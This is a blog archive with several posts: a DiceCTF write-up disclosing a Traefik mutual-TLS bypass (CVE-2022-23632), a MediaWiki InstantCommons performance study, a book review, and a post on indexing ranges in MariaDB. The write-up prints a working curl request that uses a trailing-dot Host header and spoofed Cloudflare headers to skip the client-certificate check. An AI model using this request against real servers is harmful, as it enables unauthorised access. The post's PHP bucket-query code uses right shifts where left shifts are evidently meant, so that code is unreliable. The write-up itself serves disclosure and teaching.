Wednesday, July 20, 2022

Interviewed on Between the brackets

 This week I was interviewed by Yaron Karon for the second time for his MediaWiki podcast Between the Brackets.

Yaron has been doing this podcast for several years now, and I love how he highlights the different voices of all the different groups that use, interact and develop MediaWiki. He's had some fascinating people on his podcast over the years, and I highly reccomend giving it a listen.

Anyhow, it's an honour to be on the program again for episode 117. I was previously on the program 4 years ago for episode 5


Monday, July 18, 2022

Write up DiceCTF 2022: Flare and stumbling upon a Traefik 0-day (CVE-2022-23632)

 A while back, I participated in DiceCTF. During the contest I was the first person to solve the problem "Flare":

This was pretty exciting. Normally I'm happy just to be able to solve a problem — I'm never first. Even better though, my solution wasn't the intended solution, and I had instead found a 0-day in the load balancing software the contest was using!

The contest was a while ago so this post is severely belated. Nonetheless, given how exciting this all was, I wanted to write it up.

The Problem

The contest problem was short and sweet. You had a flask app behind Cloudflare. If you accessed it with an internal IP address (e.g. 192.168.0.2 or 10.0.0.2), you get the flag. The entire code is just 18 lines, mostly boilerplate:

import os
import ipaddress

from flask import Flask, request
from gevent.pywsgi import WSGIServer

app = Flask(__name__)
flag = os.getenv('FLAG', default='dice{flag}')

@app.route('/')
def index():
    ip = ipaddress.ip_address(request.headers.get('CF-Connecting-IP'))

    if isinstance(ip, ipaddress.IPv4Address) and ip.is_private:
        return flag

    return f'No flag for {format(ip)}'

WSGIServer(('', 8080), app).serve_forever()
  

Avenues of Attack

Simple to understand, but how to attack? The direct approach seems unlikely; The service is behind Cloudflare — if we can trick Cloudflare into thinking we are connecting to a site from an arbitrary IP address, then that would be a very significant vulnerability. If we could actually make a TCP connection to Cloudflare from a IP address that should not be globally routable, then something is seriously wrong with the internet.

Thinking about it, it seems like the following approaches are possible:

  • Hack Cloudflare to send the wrong CF-Connection-IP header (Seems impossible)
  • Use some sort of HTTP smuggling or header normalization issue to send something that flask thinks is a valid CF-Connection-IP header, but Cloudflare doesn't recognize, and hope that when faced with 2 conflicting headers, flask chooses ours instead of Cloudflare's. (Also seems impossible)
  • Find the backend server and connect to it directly, bypassing Cloudflare allowing us to send whatever header we want


 With that in mind, I figured it had to be the third one. After all, this is a challenge, so it must have a solution, hence I figured it's probably neither impossible nor involving a high value vulnerability in a major CDN.

I was wrong of course. The intended solution was sort of a combination of the first possibility which i dismissed as impossible and python having an "interesting" definition of an "internal" IP, which there is no way I ever would have gotten. More on that later.

Trying to Find the Backend

So now that I determined my course of action, I started hunting for the backend server. I tried googling around for snippets from the page to see if any other sites came up in google with the same text. I tried looking at various "dns history" sites that were largely useless. I tried certificate transparency logs, but no. I even tried blindly typing in variations on the challenge's domain name.

The setup for the challenges were as follows: This challenge was on https://flare.mc.ax. The other challenges were all on *.mc.ax. This was the only challenge served by Cloudflare, the rest were served directly by the CTF infrastructure using a single IP address and a wildcard certificate.

With that in mind, I thought, maybe I could connect to the IP serving the other challenges, give the flare.mc.ax SNI and host header, and perhaps I will be directly connected to the backend. So I tried that, as well as the domain fronting version where you give the wrong SNI but the right host header. This did not work. However, to my surprise instead of getting a 404 response, I got a 421 Misdirected Redirect.

421 essentially means you asked for something that this server is not configured to give you, so you should re-check your DNS resolution to make sure you have the right IP address and try again. In HTTP/2, you are allowed to reuse a connection for other domains as long as it served a TLS certificate that would work for the other domain (This is called "Connection coalescing"). However, sometimes that back-fires especially with wildcard certs. Just because a server serves a TLS certificate for *.example.com, doesn't mean it knows how to literally handle everything under example.com since some subdomains might be served by a different server on a different IP. The new error code was created for such cases, to tell the browser it should stop with the connection coalescing, look up the DNS records for the domain name again, and open a separate connection. We needed a new code, because if the server just responded with a 404, the browser wouldn't know if its because the page just doesn't exist, or if its because the connection was inappropriately coalesced.

Looking back, I'm not sure I should have seen this as a sign. After all I was asking for a domain name that this server did not serve but had a correct certificate for, so this was the appropriate HTTP status code to give. However, the uniqueness of the error code and sudden change in behaviour around the domain name I was interested in, made me feel like I was on to something.

So I tried messing around with variations in headers and SNI. I tried silly things like having Host: flare.ac.mx/foo in the hopes that it would maybe confuse one layer, but another layer would strip it off, and get me the site i wanted or something like that.

Why settle for partial qualification? 

Eventually I tried Host: flare.ac.mx. (note the extra dot at the end) with no SNI.

curl 'https://104.196.60.107'  -vk --header 'host: flare.mc.ax.' --http1.1 --header 'CF-Connecting-IP: 127.0.0.1' --header 'X-Forwarded-For: 127.0.0.1' --header 'CF-ray: REDACTED' --header 'CF-IPCountry: CA' --header 'CF-Visitor: {"scheme":"https"}' --header 'CDN-Loop: cloudflare'

It worked.

Wait what?

What does a dot at the end of a domain name even mean?

In DNS, there is the concept of a partially qualified domain name (PQDN), and its opposite, the fully qualified domain name (FQDN). A partially qualified domain name is similar to a relative path - you can setup a default DNS search path in your DNS config (usually set by DHCP) that acts as a default suffix for partially qualified domain names. For example, if your default search path is example.com and you look up the host foo DNS will check foo.example.com.

I imagine this made more sense during the early internet, when it was more a "network of networks", and it was more common that you wanted to look up local resources on your local network.

In DNS, there is the root zone, which is represented by the empty string. This is the top of the DNS tree, which has TLDs like com or net, as its children.

If you add a period to the end of your DNS name, for example foo., this tells the DNS software that it isn't a partially qualified DNS name, but what you actually want, is to look up the foo domain in the root zone. So it does not lookup foo.example.com., but instead just foo..

For the most part, this is an obscure bit of DNS trivia. However, as far as web browsers are concerned, the PQDN example.net and FQDN example.net. are entirely separate domains. The same origin policy treats them differently, cookies set to one do not affect the other (TLS certificates seem to work for both though). In the past, people have used this trick to avoid advertisers on some websites.

So why did this work

So at this point, I solved the puzzle, obtained the flag and submitted it. Yay me!
 
But I still wasn't really sure what happened. I assumed there was some sort of misconfiguration involved, but I wasn't sure what. I did not have the configuration of the load-balancer. For that matter, I wasn't even sure yet which load balancing software was in use.

After I solved the problem, the competition organizers reached out and asked me what method I use. I imagine they wanted to see if I found the intended solution or stumbled upon something else. When I told them, they were very surprised. Apparently mutual TLS had been set up with cloudflare, and it should have been impossible to contact the backend if you did not have the correct client certificate, which I did not.

Wait what!?

The load balancing software in question was Traefik. In it, you can configure various requirements for different hosts. For example, you can say that a certain host needs a specific version of TLS, specific ciphers, specific server certificate or even a specific client certificate (mTLS). There is also a section for default options. In this case, they had one set of TLS settings for most of the domains, and a rule for the flare domain that you needed the correct client certificate to get access.

In normal operation, the SNI is checked and the appropriate requirements are applied. In the event that the SNI doesn't match the host header, and the host header matches a domain with different TLS requirements then the default requirements, a 421 status code is sent. This is all good.

However, if the host header has a period at the end to make it a FQDN, the code checking the TLS requirements doesn't think it matches the non-period version, so only the default requirements apply. However the rest of the code will still forward the request to the correct domain and process it as normal.

Thus, you can bypass any domain specific security requirements by not sending the SNI and adding an extra period to the host header.

This would be one thing for settings like min TLS version. However, it is an entirely different thing for access control settings such as mutual TLS as it allows an attacker to fully bypass the required client certificate, getting access to things they shouldn't be able to.

I reported this to the Traefik maintainers, and they fixed the issue in version 2.6.1. It was assigned CVE-2022-23632 and you can read more about it in their advisory. This was pretty exciting as well, as Traefik is used by quite a few people, and based on their github security advisory page, this is the first high-severity vulnerability that has been found in it.

What was the intended solution?

I found out later from the organizers of the CTF, that the intended solution was something very different. I definitely would never have came up with this myself.

The intended solution was to exploit two weird behaviours:

  • The python ipaddress library considers class E IP addresses (i.e. 240.0.0.0/4) to be "private". Class E addresses are reserved for future use. They are not globally routable, but they aren't private either, so it is odd that python considers them private. Python's own docs say that is_private is "True if the address is allocated for private networks" linking to IANA's official list, even though 240.0.0.0/4 is not listed as private use on that list.
  • Cloudflare has a feature where if your site does not support IPv6, you can enable "Pseudo IPv4", where the ipv6 connections will be forwarded as if they come from a class E IPv4 address. Cloudflare talks more about it in their blog post.

Which is a pretty fascinating combination.

Initially I discarded the possibility you could make Cloudflare give the wrong IP address, because I thought that would be such a major hack, that it wouldn't show up in this type of contest; people would either be reporting it or exploiting it, depending on the colour of their hat. However, my assumption was based on the idea that any sort of exploit would let you pick your IP. Being able to present as a random class E (which class E IP is based on an md5 hash of the top 64 bits of your IPv6 address, so you cannot choose it), is no where near as useful as being able to chose your IP (Everyone is just so trusting of 127.0.0.1). While this is a fascinating challenge, its hard to imagine a non-contrived situation where this would be a useful primitive. Making network access control in the real world that just blacklists all globally routable IPs instead of your own network seems silly. Even sillier would be to whitelist class E for some reason. Sure I guess an attacker could masquerade as one of these class E addresses to confuse anti-abuse systems, but if the site properly processes those connections, then it seems anti-abuse systems are likely to handle them just as easily as a normal IP. Since its still tied to your real IP, you can't hop between them unless you can hop between real IPs. If it ever really became an issue, Cloudflare lets you disable them, and there is also an additional header with the original IPv6 address you can use. At worst, maybe it makes reading logs after an incident more complicated, but this would be a really bad way to hide yourself in a world where VPNs are cheap and tor is free. In conclusion - its a fascinating behaviour, but practically speaking doesn't seem exploitable in the way that "make Cloudflare report your ip is something other than your ip" sounds like it would be exploitable at first glance.

 

 

Tuesday, July 12, 2022

Making Instant Commons Quick

 The Wikimedia family of websites includes one known as Wikimedia Commons. Its mission is to collect and organize freely licensed media so that other people can re-use them. More pragmatically, it collects all the files needed by different language Wikipedias (and other Wikimedia projects) into one place.

 

The 2020 Wikimedia Commons Picture of the Year: Common Kingfisher by Luca Casale / CC BY SA 4.0

 As you can imagine, it's extremely useful to have a library of freely licensed photos that you can just use to illustrate your articles.

However, it is not just useful for people writing encyclopedias. It is also useful for any sort of project.

To take advantage of this, MediaWiki, the software that powers Wikipedia and friends, comes with a feature to use this collection on your own Wiki. It's an option you can select when installing the software and is quite popular. Alternatively, it can be manually configured via $wgUseInstantCommons or the more advanced $wgForeignFileRepos.

The Issue

Unfortunately, instant commons has a reputation for being rather slow. As a weekend project I thought I'd measure how slow, and see if I could make it faster.

How Slow?

First things first, I'll need a test page. Preferably something with a large (but not extreme) number of images but not much else. A Wikipedia list article sounded ideal. I ended up using the English Wikipedia article: List of Governors General of Canada (Long live the Queen!). This has 85 images and not much else, which seemed perfect for my purposes.

I took the expanded Wikitext from https://en.wikipedia.org/w/index.php?title=List_of_governors_general_of_Canada&oldid=1054426240&action=raw&templates=expand, pasted it into my test wiki with instant commons turned on in the default config.

And then I waited...

Then I waited some more...

1038.18761 seconds later (17 minutes, 18 seconds) I was able to view a beautiful list of all my viceroys.

Clearly that's pretty bad. 85 images is not a small number, but it is definitely not a huge number either. Imagine how long [[Comparison_of_European_road_signs]] would take with its 3643 images or [[List_of_paintings_by_Claude_Monet]] with 1676.

Why Slow?

This raises the obvious question of why is it so slow. What is it doing for all that time?

When MediaWiki turns wikitext into html, it reads through the text. When it hits an image, it stops reading through the wikitext and looks for that image. Potentially the image is cached, in which case it can go back to rendering the page right away. Otherwise, it has to actually find it. First it will check the local DB to see if the image is there. If not it will look at Foreign image repositories, such as Commons (if configured).

To see if commons has the file we need to start making some HTTPS requests¹:

  1. We make a metadata request to see if the file is there and get some information about it: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=timestamp%7Cuser%7Ccomment%7Curl%7Csize%7Csha1%7Cmetadata%7Cmime%7Cmediatype%7Cextmetadata&prop=imageinfo&iimetadataversion=2&iiextmetadatamultilang=1&format=json&action=query&redirects=true&uselang=en
  2.  We make an API request to find the url for the thumbnail of the size we need for the article. For commons, this is just to find the url, but on wikis with 404 thumbnail handling disabled, this is also needed to tell the wiki to generate the file we will need: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=300&iiurlheight=-1&iiurlparam=300px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en
  3.  Some devices now have very high resolution screens. Screen displays are made up of dots. High resolution screens have more dots per inch, and thus can display more fine detailed. Traditionally 1 pixel equalled one dot on the screen. However if you keep that while increasing the dots-per-inch, suddenly everything on the screen that was measured in pixels is very small and hard to see. Thus these devices now sometimes have 1.5 dots per pixel, so they can display fine detail without shrinking everything. To take advantage of this, we use an image 1.5 times bigger than we normally would, so that when it is displayed in its normal size, we can take advantage of the extra dots and display a much more clear picture. Hence we need the same image but 1.5x bigger: https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=450&iiurlheight=-1&iiurlparam=450px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en
  4. Similarly, some devices are even higher resolution and use 2 dots per pixel, so we also fetch an image double the normal size:  https://commons.wikimedia.org/w/api.php?titles=File%3AExample.png&iiprop=url%7Ctimestamp&iiurlwidth=600&iiurlheight=-1&iiurlparam=600px&prop=imageinfo&format=json&action=query&redirects=true&uselang=en

 

This is the first problem - for every image we include we have to make 4 api requests. If we have 85 images that's 340 requests.

Latency and RTT

It gets worse. All of these requests are done in serial. Before doing request 2, we wait until we have the answer to request 1. Before doing request 3 we wait until we get the answer to request 2, and so on.

Internet speed can be measured in two ways - latency and bandwidth. Bandwidth is the usual measurement we're familiar with: how much data can be transferred in bulk - e.g. 10 Mbps.

Latency, ping time or round-trip-time (RTT) is another important measure - it's how long it takes your message to get somewhere and come back.

When we start to send many small messages in serial, latency starts to matter. How big your latency is depends on how close you are to the server you're talking to. For Wikimedia Commons, the data-centers (DCs) are located in San Francisco (ulsfo), Virginia (eqiad), Texas (codfw), Singapore (eqsin) and Amsterdam (esams). For example, I'm relatively close to SF, so my ping time to the SF servers is about 50ms. For someone with a 50ms ping time, all this back and forth will take at a minimum 17 seconds just from latency.

However, it gets worse; Your computer doesn't just ask for the page and get a response back, it has to setup the connection first (TCP & TLS handshake). This takes additional round-trips.

Additionally, not all data centers are equal. The Virginia data-center (eqiad)² is the main data center which can handle everything, the other DCs only have varnish servers and can only handle cached requests. This makes browsing Wikipedia when logged out very speedy, but the type of API requests we are making here cannot be handled by these caching DCs³. For requests they can't handle, they have to ask the main DC what the answer is, which adds further latency. When I tried to measure mine, i got 255ms, but I didn't measure very rigorously, so I'm not fully confident in that number. In our particular case, the TLS & TCP handshake are handled by the closer DC, but the actual api response has to be fetched all the way from the DC in Virginia.

But wait, you might say: Surely you only need to do the TLS & TCP setup once if communicating to the same host. And the answer would normally be yes, which brings us to major problem #2: Each connection is setup and tore down independently, requiring us to re-establish the TCP/TLS session each time. This adds 2 additional RTT. In our 85 image example, we're now up to 1020 round-trips. If you assume 50ms to caching DC and 255ms to Virginia (These numbers are probably quite idealized, there are probably other things I'm not counting), we're up to 2 minutes.

To put it altogether, here is a diagram representing all the back and forth communication needed just to use a single image:

12 RTT per image used! This is assuming TLS 1.3. Earlier versions of TLS would be even worse.

Introducing HTTP/2

In 2015, HTTP/2 came on the scene. This was the first major revision to the HTTP protocol in almost 20 years.

The primary purpose of this revision of HTTP, was to minimize the effect of latency when you are requesting many separate small resources around the same time. It works by allowing a single connection to be reused for many requests at the same time and allowing the responses to come in out of order or jumbled together. In HTTP/1.1 you can sometimes be stuck waiting for some request to finish before being allowed to start on the next one (Head of line blocking) resulting in inefficient use of network resources

This is exactly the problem that instant commons was having.

Now I should be clear, instant commons wasn't using HTTP/1.1 in a very efficient way, and it would be possible to do much better even with HTTP/1.1. However, HTTP/2 will still be that much better than what an improved usage of HTTP/1.1 would be.

Changing instant commons to use HTTP/2 changed two things:

  1. Instead of creating a new connection each time, with multiple round trips to set up TCP and TLS, we just use a single HTTP/2 connection that only has to do the setup once.
  2. If we have multiple requests ready to go, send them all off at once instead of having to wait for each one to finish before sending the next one.

We still can't do all requests at once, since the MediaWiki parser is serial, and it stops parsing once we hit an image, so we need to get information about the current image before we will know what the next one we need is. However, this still helps as for each image, we send 4 requests (metadata, thumbnail, 1.5dpp thumbnail and 2dpp thumbnail), which we can now send in parallel.


The results are impressive for such a simple change. Where previously my test page took 17 minutes, now it only takes 2 (139 seconds).


Transform via 404

In vanilla MediaWiki, you have to request a specific thumbnail size before fetching it; otherwise it might not exist. This is not true on Wikimedia Commons. If you fetch a thumbnail that doesn't exist, Wikimedia Commons will automatically create it on the spot. MediaWiki calls this feature "TransformVia404".

In instant commons, we make requests to create thumbnails at the appropriate sizes. This is all pointless on a wiki where they will automatically be created on the first attempt to fetch them. We can just output <img> tags, and the first user to look at the page will trigger the thumbnail creation. Thus skipping 3 of the requests.

Adding this optimization took the time down from 139 seconds with just HTTP/2 to 18.5 seconds with both this and HTTP/2. This is 56 times faster than what we started with!



Prefetching

18.5 seconds is pretty good. But can we do better?

We might not be able to if we actually have to fetch all the images, but there is a pattern we can exploit.

Generally when people edit an article, they might change a sentence or two, but often don't alter the images. Other times, MediaWiki might re-parse a page, even if there are no changes to it (e.g. Due to a cache expiry). As a result, often the set of images we need is the same or close to the set that we needed for the previous version of the page. This set is already recorded in the database in order to display what pages use an image on the image description page

We can use this. First we retrieve this list of images used on the (previous version) of the page. We can then fetch all of these at once, instead of having to wait for the parser to tell us one at a time which image we need.

It is possible of course, that this list could be totally wrong. Someone could have replaced all the images on the page. If it's right, we speed up by pre-fetching everything we need, all in parallel. If it's wrong, we fetched some things we didn't need, possibly making things slower than if we did nothing.

I believe in the average case, this will be a significant improvement. Even in the case that the list is wrong, we can send off the fetch in the background while MediaWiki does other page processing - the hope being, that MediaWiki does other stuff while this fetch is running, so if it is fetching the wrong things, time is not wasted.

On my test page, using this brings the time to render (Where the previous version had all the same images) down to 1.06 seconds. A 980 times speed improvement! It should be noted, that this is time to render in total, not just time to fetch images, so most of that time is probably related to rendering other stuff and not instant commons.

Caching

All the above is assuming a local cache miss. It is wasteful to request information remotely, if we just recently fetched it. It makes more sense to reuse information recently fetched.

In many cases, the parser cache, which in MediaWiki caches the entire rendered page, will mean that instant commons isn't called that often. However, some extensions that create dynamic content make the parser cache very short lived, which makes caching in instant commons more important. It is also common for people to use the same images on many pages (e.g. A warning icon in a template). In such a case, caching at the image fetching layer is very important.

There is a downside though, we have no way to tell if upstream has modified the image. This is not that big a deal for most things. Exif data being slightly out of date does not matter that much. However, if the aspect ratio of the image changes, then the image will appear squished until InstantCommons' cache is cleared.

To balance these competing concerns, Quick InstantCommons uses an adaptive cache. If the image has existed for a long time, we cache for a day (configurable). After all, if the image has been stable for years, it seems unlikely it is going to be edited in very soon. However, if the image has been edited recently, we use a dynamically determined shorter time to live. The idea being, if the image was edited 2 minutes ago, there is a much higher possibility that it might be edited a second time. Maybe the previous edit was vandalism, or maybe it just got improved further.

As the cache entry for an image begins to get close to expiring, we refetch it in the background. The hope is that we can use the soon to be expired version now, but as MediaWiki is processing other things, we refetch in background so that next time we have a new version, but at the same time we don't have to stall downloading it when MediaWiki is blocked on getting the image's information. That way things are kept fresh without a negative performance impact.

MediaWiki's built-in instant commons did support caching, however it wasn't configurable and the default time to live was very low. Additionally, the adaptive caching code had a bug in it that prevented it from working correctly. The end result was that often the cache could not be effectively used.

Missing MediaHandler Extensions

In MediaWiki's built-in InstantCommons feature, you need to have the same set of media extensions installed to view all files. For example, PDFs won't render via instant commons without Extension:PDFHandler.

This is really unnecessary where the file type just renders to a normal image. After all, the complicated bit is all on the other server. My extension fixes that, and does its best to show thumbnails for file types it doesn't understand. It can't support advanced features without the appropriate extension e.g. navigating in 3D models, but it will show a static thumbnail.

Conclusion

In the end, by making a few, relatively small changes, we were able to improve the performance of instant commons significantly. 980 times as fast!

Do you run a MediaWiki wiki? Try out the extension and let me know what you think.

Footnotes:

¹ This is assuming default settings and an [object] cache miss. This may be different if $wgResponsiveImages is false in which case high-DPI images won't be fetched, or if apiThumbCacheExpiry is set to non-zero in which case thumbnails will be downloaded locally to the wiki server during the page parse instead of being hotlinked.


² This role actually rotates between the Virginia & Texas data center. Additionally, the Texas DC (when not primary) does do some things that the caching DCs don't that isn't particularly relevant to this topic. There are eventual plans to have multiple active DCs which all would be able to respond to the type of API queries being made here, but they are not complete as of this writing - https://www.mediawiki.org/wiki/Wikimedia_Performance_Team/Active-active_MediaWiki


³ The MediaWiki API actually supports an smaxage=<number of seconds> (shared maximum age) url parameter. This tells the API server you don't care if your request is that many seconds out of date, and to serve it from varnish caches in the local caching data center if possible. Unlike with normal Wikipedia page views, there is no cache invalidation here, so it is rarely used and it is not used by instant commons.





Friday, July 8, 2022

Book review: Binti

 I've never written a book review before, but what is a blog if not a platform to give your uninformed opinion to people who don't care about it :)


Recently I read the novella Binti by Nnedi Okorafor. I had recently saw it on the shelf at the library and I remembered it being pretty popular back when it was released, so thought i would give it a go. Overall, i liked it up to the ending, which I strongly disliked.

In general, it seemed like a fun coming of age/space opera-esque story. You have a main character who is an outsider and unsure of herself. Due to circumstances beyond her control she is thrust into the middle of interplanetary conflict which only she can resolve due to unique traits which originally had marked her as an outsider.

None of this is particularly ground breaking - I have read many stories with that type of plot structure - but it still makes for a fun story. The weird part here, is I don't think this is the type of story that the author intended to write. From what I remember of this book's release, the selling point was supposed to be how it explored the main character's culture (Which from what I understand is based on the real human culture of the Himba people). However, to me, that seemed like the most weak and superficial part of the book. All we really get, is that they don't like outsiders, and use an ointment made of mud that is very culturally important. We get very little in terms of why this is meaningful to the character, or how it affects her worldview, etc.

Its a reasonably common theme to explore "culture" in science fiction works. Admittedly, it is somewhat rarer but definitely not unheard of to explore it as an end in itself. More common is to have an alien culture to juxtapose against contemporary mainstream culture to make some point about the mainstream culture of the context the writer is writing in. Novels such as The Dispossessed and Stranger In A Strange Land come to mind as novels that posit some alien culture to contrast it with contemporary culture. Other times alien characters have a unique culture to provide an aesthetic of otherness for them. Consider how boring most aliens in star trek are compared to the Klingons that have a much better developed cultural back story. Or how alien the aliens feel in the Lilith's Brood series. Even if the cultural exploration is arguably not the primary point to these novels, the cultures they explore feel rounded and fleshed out. The cultural depiction in Binti seems flat comparatively, because even if its tied to a real culture, it was barely explored in the novella.

Ultimately I felt like this novella worked as a fun space adventure; it didn't work as an interesting cultural exploration.

Last of all the: The ending [Major spoilers ahead]

The ending ruined the book for me. It did not make sense in terms of character logic nor character emotion.

Basically - the aliens, who are very isolationist, are mad because the university stole the stinger of one of their leaders to display as an artifact. So they decide to murder everyone on a ship full of students in order to sneak in and retrieve it (or die trying). The situation is resolved by the university saying sorry, claiming that doing such a thing was against policy, and the appropriate people will be punished. Additionally one of the aliens was invited to be an exchange student.

To me, this felt just one step above, "it was all a dream". It makes no sense how the university could accidentally have obtained the artifact without realizing it was unethically sourced. Some researchers just show up with an alien body part, from aliens who generally refuse to talk to outsiders, and everyone just assumed the alien gave consent for this? It is difficult to reconcile these plot points together logically, unless the university was intentionally turning a blind eye, in which case, why would their apology be accepted? Second, nobody was at all upset that everyone on the ship was slaughtered. I could understand maybe letting bygones be bygones for the greater good - but they should at least be a little sad about it. Nobody seemed to care at all.

In conclusion: Generally fun plot. The "cultural" aspects were superficial and overrated. Ending sucked.






Sunday, May 1, 2022

Finding if an item is a list of ranges stored in a DB

 Recently, I've decided to experiment with making a reporting extension for MediaWiki (Working name "Sofa") as a side project. There are already several options already in this space, notably Cargo, Semantic MediaWiki (SMW) and DynamicPageLst (DPL). However, I think the design space is still a little under explored. My goal is to experiment with some rather different design choices, and see what I end up with. In particular - I want to make one that respects the core wiki philosophy of "quick" - e.g. changes are reflected immediately, and "soft-security", where nothing users can do, whether accidentally or maliciously, cause any (performance) harm but can simply be reverted. Current solutions often require manual cache purging to see changes reflected and can have unpredictable user-dependent performance characteristics where subtle user choices in extreme cases could even cause a DB overload.

I don't want to talk too much about the new extension generally, as that's not what this blog post is about and I am still in the early stages. However one design requirement that left me in a bit of a conundrum is the automatic cache purging one. In the model for this extension, we have ordered lists of items and pages that display a range of items from the list. In order to support cache purging when someone adds a new entry that would appear in a used range, we need some way to store what ranges of items are used by what pages so that given a specific item, we can query which pages use a range containing that item. This turned out to be surprisingly difficult. I thought I'd write a post about the different methods I considered. 

The naive approach

For example we might have the following list of alphabetically ordered items

iditem
17Alpha
12Atom
21Beta
34Bobcat
8Bonsai Tree

And a page might want to include all items between Amoeba and Bobcat (Note that Amoeba is not actually in the list).

In this example, we need someway to record that the page is using items between Amoeba and Bobcat, so if someone inserts Badger into the list, the page using the list gets refreshed.

The natural way of doing this would be a MariaDB table like the following:

list_cache table
idpage_idlist_startlist_end
11234AmoebaBobcat

Along with 2 indicies: one on list_start and the other on list_end.[1]

In the event Badger gets added to the list, we would need to query what pages to refresh. In this structure we would use a query like: SELECT page_id FROM list_cache WHERE "Badger" BETWEEN list_start AND list_end; 

This all works. However there is one problem, to answer that query the DB has to look at a number of rows beside the rows we're interested in. For best performance, we ideally want to make the database look at as few rows as possible to answer our query. Ideally it would only look at rows that are relevant to the answer.

An index in the database is an ordered list of rows from a table - like a phonebook. In this case we have two - one for the start of the range and one for the end. In essence we want information from both, however that's not how it works.

"'badger' BETWEEN list_start AND list_end" is really just a fancy way of saying list_start < 'badger' AND list_end > 'badger'. The RDBMS then has a choice to make: It can use the list_start index, go to the spot in that index where badger would be, and then work its way down to the bottom of the list, checking each row individually for if the second condition is true. Alternatively it can pull up the list_end index and do the same thing but reversed.

However, once it picks an index and goes to it starting place, it has to look at every entry until it hits the beginning (Respectively end) of the index. If the starting place is in the middle of the index, it would have to look at roughly half the rows in order to answer the query. If this system was used at scale and the table had 2 million rows, the database might have to look at a million rows, just to find the 3 that are matching. This is definitely not ideal

 

[1] Potentially you could do a compound index on (list_start,list_end) and (list_end,list_start) instead which allows the DB to look directly at the index instead of constantly looking up each row in the underlying table. I'm unclear on if the benefit of index-condition-pushdown outweighs the increased index size, I suspect it would mildly, but either way things are still rather inefficient.

Interval trees

At this point, like any good programmer, I started googling and trawling stack overflow. Eventually I stumbled upon the article "A Static Relational Interval Tree" by Laurent Martin on the SolidQ blog.

At first glance this seemed the exact solution I was looking for. On second glance - not so much. This is a really cool technique; unfortunately it scales with the number of bits needed to represent the data type you are using. If I was looking at ranges of integers, dates or IP addresses, this would be perfect. Unfortunately I am using strings which take a large number of bits. Nonetheless, I'm going to describe the technique, as I think its really cool, and should be more widely known.

The core idea, is to separate the different ranges into a number of buckets. Each bucket can be queried separately but efficiently - Any row that the DB has to look at, is a row that would match the query. In order to find all the ranges that contain a specific point, you just need to query all the applicable buckets. The number of buckets that are applicable in the worst case is the same as the number of bits needed to represent the data type (hence the applicability to ranges of ints but not long strings).

The end result is: if you are using ranges of 32-bit integer, you would have to do 32 really efficient separate queries (or 1 query after UNIONing them together). For a large DB, this is much better than 1 inefficient query that might read millions of rows or more.

For simplicity, in the explanation I will use 4 bit integers (0-16).

Buckets

So, what are these buckets? They are simply the shared binary prefix of the two ends of the range with a 1 followed by 0's appended to fill out the rest of the binary number. Here are some examples:

Range startRange endShared prefixBucket
10 (1010b)13 (1101b)112 (1100b)
9 (1001b)10 (1010b)1010 (1010b)
9 (1001b)9 (1001b)10019 (1001b)

In the database, we can use virtual columns to have mariaDB manage this for us, using the formula range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2)))

CREATE TABLE ranges (
    id int unsigned PRIMARY KEY AUTO_INCREMENT,
    range_start int NOT NULL,
    range_end int NOT NULL,
    bucket int as (range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2))))
);
CREATE INDEX start on ranges (bucket, range_start);
CREATE INDEX end on ranges (bucket, range_end);

Now we can just insert things like normal, and MariaDB will take care of calculating the bucket number.

Querying

This has the following useful property: Any range assigned to bucket number n must contain the value n. For example, bucket 12 might have the range [10,13] in it, or [12,12], all of which contain the point 12. It would not be able to have the range [10,11] as that does not go through the point 12.

This is useful, since if we have a specific number of interest, we can easily query the bucket to see if it is in there. For example, if we wanted to know all the ranges in bucket 12 containing 9, we can query WHERE bucket = 12 AND range_start <= 9; since if a range is in bucket 12, it must contain the value 12, so any range that starts before or equal 9, must go through 9 in order to get to 12. If we have an index on (bucket, range_start), this is a really efficient query that will only look at the rows that are of interest. Similarly, if the number of interest is greater than the bucket number, we do the same thing, just with range_end >= instead.

Now that we know how to get all the relevant ranges from one bucket efficiently, we just need to figure out what all the relevant buckets are, and we have a solution (remembering that at most log of the data type number of buckets need to be consulted).

Finding the buckets

To find the buckets, we simply take the first x bits of the binary representation and append 1 followed by 0s to fill out the number, for all x.

For example, if we wanted to find all the buckets that are relevant to ranges containing 9 (1001b):

buckets that can contain 9 (1001b)
bits maskedprefixbuckettop or bottom
0
8 (1000)top
11b12 (1100)bottom
210b10 (1010)bottom
3100b9 (1001)top (either)

We would have to look at buckets 8,12,10 and 9. If the bit immediately after the prefix is a 1 (or equivalently if our point >= bucket) we have to look at the top of the bucket, otherwise, we look at the bottom. By this, we mean whether the query is range_end <= point or range_start >= point respectively.

So with that in mind, in our example we would make a query like:

SELECT id, range_start, range_end FROM ranges WHERE bucket = 8 and range_end <= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 12 and range_start >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 10 and range_start >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 9 and range_end <= 9;

Which is a union of queries that each individually are very efficient.

To generate this, you might use code like the following (in php):

define( "MAX_BITS", 4 );
function makeQuery ( $target ) {
	$mask = 0;
	$query = '';
	for ( $i = MAX_BITS-1; $i >= 0; $i-- ) {
		$mask = $mask | (1>>$i);
		$tmpMask = $mask ^ (1>>$i);
		$pad = 1 >> $i;
		$bucket = ($target & $tmpMask) | $pad;

		$query .= "SELECT id, range_start, range_end FROM ranges WHERE bucket = $bucket ";
		if ( $target < $bucket ) {
			$query .= "AND range_start >= $target ";
		} else {
			$query .= "AND range_end <= $target ";
		}
		if ( $i != 0 ) {
			$query .= "\nUNION ALL ";
		}
	}
	return $query . ";";
}

 

 

Tuesday, February 8, 2022

Write up for DiceCTF 2022: nocookies

Last weekend I participated in DiceCTF. There was some very interesting challenges and I had a lot of fun. Here is a write-up for one of the challenges I solved.

For this challenge, we're presented with a note-keeping app. It allows storing either plaintext or markdown notes. The main distinction is instead of using cookies, it just asks you for a password on every page load.

The admin bot

The challenge also includes an admin bot, that you can give urls to, to visit. Here is a snippet from its code:

